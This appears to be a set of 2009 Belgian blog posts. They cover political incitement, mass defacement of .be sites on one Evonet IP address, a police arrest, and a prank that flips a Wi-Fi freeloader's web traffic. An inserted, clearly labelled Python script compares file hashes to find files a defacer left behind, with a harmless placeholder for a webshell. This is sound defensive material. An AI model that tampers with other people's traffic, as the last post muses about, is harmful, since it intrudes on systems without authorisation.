And so some nut(s) will say one day that if all these politicians just keep talking without doing something against such a big threat (confirmed by those very wise, powerful and influential conservatives), "then they will do it".

Nuts are like time bombs. They only start ticking if the environment in which they live becomes explosive. Or if they perceive it as such.

tic tac tic tac tic tac tic tac tic tac

And I already accuse those who create that atmosphere of responsibility for anything that may happen to any elected official. And the PR masters behind this campaign should remember the film Fantasia, in which Mickey takes the master's hat and ends up with so much power that he loses control. I do not think you really know what you are doing and what the end result of this kind of campaign may be. And do not complain afterwards that you didn't foresee this or that. You started the wildfire; you are responsible for the damage, including the things you didn't want to happen (afterwards). There were Kennedy and Martin Luther King before.

08/12/2009

Evonet has 500 hacked .be sites and some still are

They all have the same IP address and look like homepages made with Flash and some other fancy things. They each have a separate .be domain name but the same IP address (this is going to be fun if some of them are spammers and blocklists filter on the IP address).

Looking through zone-h.org we saw that nearly 500 of these pages had been hacked (Linux and Apache) and that when the hackers changed the homepage of a site (sic) it was cleaned, but the cleaners didn't do their job very well: they didn't check whether the hackers had done other things too, like adding a page.

They have added a page of nonsense to a few hundred other sites. If it isn't cleaned up, it won't be long before the first blocking appears (and all the sites have the same IP address).

Maybe the hackers have left a backdoor, a keylogger or a time bomb. Who knows? Did you check?
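An added example, not from the original post or from Evonet: the check the cleaners skipped. It builds a SHA-256 manifest of the web root while the site is known good and diffs it against the current tree, so anything added, removed or changed shows up by content, including a hidden file in a directory nobody looks at. The web root, file names and "defacement" are constructed in a temporary directory for the demonstration.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def build_manifest(root) -> dict:
    """relative path -> SHA-256 of every regular file under root (hidden files included)."""
    root = Path(root)
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            p = Path(dirpath) / fn
            manifest[p.relative_to(root).as_posix()] = hashlib.sha256(p.read_bytes()).hexdigest()
    return manifest


def diff_manifests(known_good: dict, current: dict) -> dict:
    """What a defacer left behind, by content and not by timestamp (mtimes are trivially
    reset with touch; a hash is not)."""
    return {
        "added": sorted(set(current) - set(known_good)),
        "removed": sorted(set(known_good) - set(current)),
        "modified": sorted(p for p in known_good.keys() & current.keys()
                           if known_good[p] != current[p]),
    }


def demo() -> tuple:
    """Constructed web root in a temp dir: take the manifest while the site is clean,
    'deface' it the way the zone-h entries above show (index.html replaced, an extra
    index.html dropped into images/), then 'clean up' by restoring only the homepage."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        clean = {"index.html": b"<html>welcome</html>",
                 "images/logo.png": b"\x89PNG stand-in",
                 "css/style.css": b"body { color: black }"}
        for rel, data in clean.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(data)
        known_good = build_manifest(root)

        # The defacement: homepage replaced, a second page dropped in images/, and a
        # hidden stand-in for a webshell in a directory nobody browses.
        (root / "index.html").write_bytes(b"<html>defaced</html>")
        (root / "images" / "index.html").write_bytes(b"<html>defaced</html>")
        (root / "img").mkdir()
        (root / "img" / ".cache.php").write_bytes(b"<?php /* stand-in for a dropped webshell */ ?>")
        after_defacement = diff_manifests(known_good, build_manifest(root))

        (root / "index.html").write_bytes(clean["index.html"])  # the usual "clean-up"
        after_cleanup = diff_manifests(known_good, build_manifest(root))
    return after_defacement, after_cleanup


if __name__ == "__main__":
    hacked, cleaned = demo()
    print("after defacement:", hacked)
    print("after restoring index.html only:", cleaned)
```

Take the known-good manifest from a backup or from the deployment package, not from the server after the incident, and store it off the box: a defacer who can write index.html can also rewrite a manifest kept next to it. On a shared host like this one, run it per virtual host, since the "added" list of one site is the first place to look for the others.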

Have a look at zone-h or http://be-hacked.skynetblogs.be

 


it all started with a car that was not parked right

The members of a Turkish club had a meeting room next to an inner parking lot, hidden from the street, in a city in Belgium. They always met there for tea and talk and to pass some time together. It looked as if the days would pass without much happening and every day looked more or less like the day before. The quiet and easy life, you would say.

But one day there was a new car in the parking lot. They hadn't seen that car before, so it couldn't belong to someone from the neighbourhood. There was something not right with that car: it wasn't parked the way all the neighbours parked their cars there. It was strange. So this Turkish man talked to the local cop, the one responsible for community relations and for knowing more or less what happens in his block.

Interesting, the cop said. He would check it, and he consulted the database of stolen cars. Bingo. It was the car used by the prisoners who had escaped from prison the week before. They were only still looking for the girlfriend of one of them; the others had already been found.

But where could she be? The police had another clue. The girlfriend's mobile phone had been traced to a cell tower not far from the parking lot. She was definitely here. But you can't search a few thousand people. Where could she be? She wouldn't be with a Turkish family, because she wasn't Turkish. There were only a few Moroccan families living here. So he visited them. And found her.

A perfect example of a good neighbourhood relationship with the local police officer who knows his neighbourhood well, a national database and some intelligent modern tracking methods. None of those methods alone would probably have resulted in such a quick arrest, but the combination of them makes each of them more efficient. It is the puzzle, and not the pieces, on which one should concentrate. You are always missing pieces, but maybe you already have enough to make a beautiful puzzle anyway.

how to turn that wireless bandwidth thief upside down

Now and then some loser gets caught, and maybe convicted, for stealing bandwidth from neighbours who forgot to secure their installation (or had to go back to the defaults because after some upgrade nothing worked as it should).

But here I am reading a really funny piece about some IT geek who made some changes so that the bandwidth thief was seeing everything on his screen upside down or very fuzzy. I could think of some other things you could do to his computer (passing through your router), but some of them would be clearly illegal. Some of the security guys here will probably have the same ideas. I don't think they would do it again.

http://www.ex-parrot.com/~pete/upside-down-ternet.html

It all seems a bit too difficult for people who are not that technical. Someone should put it into a click-and-play tool and call it 'eat that, bandwidth thief'.